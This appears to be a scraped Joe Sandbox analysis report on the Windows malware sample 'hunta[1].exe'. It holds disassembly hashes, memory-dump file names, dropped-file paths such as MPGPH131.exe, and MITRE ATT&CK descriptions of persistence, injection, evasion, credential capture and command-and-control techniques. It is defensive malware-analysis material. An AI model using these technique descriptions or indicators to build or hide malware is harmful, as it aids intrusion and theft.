Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 2659868963-1240500531
Opcode ID: 258f7d2adcba02043f55f913fe27a3926144f96d5d609a4ade1d1b975ee23ea9
Instruction ID: 892e0ec4ccb3d8cfc838f70550755b752cf57a060b3c15531016a89cf1552865
Opcode Fuzzy Hash: 258f7d2adcba02043f55f913fe27a3926144f96d5d609a4ade1d1b975ee23ea9
Instruction Fuzzy Hash: 9441F6B5920209AFC715DF58CC41BAEF7F8EF45320F14C219F9189B681E774AA54CBA1

Function 002E4250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 002E4AB9
___std_exception_destroy.LIBVCRUNTIME ref: 002E4AD2
___std_exception_destroy.LIBVCRUNTIME ref: 002E55DD
___std_exception_destroy.LIBVCRUNTIME ref: 002E55F6

Strings

value, xrefs: 002E5503

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 3f7b988a507dc18cdc505d3fb818f37e187c89a13a2c3bb078a803906b2db2e4
Instruction ID: 1e05613be504f1061421b5781bcfbf5b7803410dc3355016b0ff615804f34b3a
Opcode Fuzzy Hash: 3f7b988a507dc18cdc505d3fb818f37e187c89a13a2c3bb078a803906b2db2e4
Instruction Fuzzy Hash: CF51B2B0C20698DFDF15DFA4CC89BDEBBB8AF05304F544259E404AB381D774AA888B91

Function 002E9630 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 002E9681

Strings

type must be boolean, but is , xrefs: 002E9772
type must be string, but is , xrefs: 002E96E8

Memory Dump Source

Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: type must be boolean, but is $type must be string, but is
API String ID: 118556049-436076039
Opcode ID: 4f89f316a25000d6372271e77e068d0bca0b1382f60b9e0981ef413721311ae6
Instruction ID: 6e53548c4497f92848ff39837fec5fcd97e55df26ad895c35140fe175e025ec2
Opcode Fuzzy Hash: 4f89f316a25000d6372271e77e068d0bca0b1382f60b9e0981ef413721311ae6
Instruction Fuzzy Hash: 08316E75D10284AFDB15EFA4D842B9EB7BCDB00310F50416AF819DB792EB34AD64CB52

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report hunta[1].exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files\7-Zip\Uninstall.exe

C:\ProgramData\MPGPH131\MPGPH131.exe

C:\ProgramData\MPGPH131\MPGPH131.exe:Zone.Identifier

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_WwKLWFk.exe_b61ee072982e165aa57f6461531a5f842ae835_ae33f148_4580b34d-0134-48d0-9aeb-c77ead72c8cd\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER88EA.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8A62.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8AA1.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\k1[1].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\k1[2].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\k2[1].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\k2[2].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\k3[1].rar

Windows Analysis Report
hunta[1].exe

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre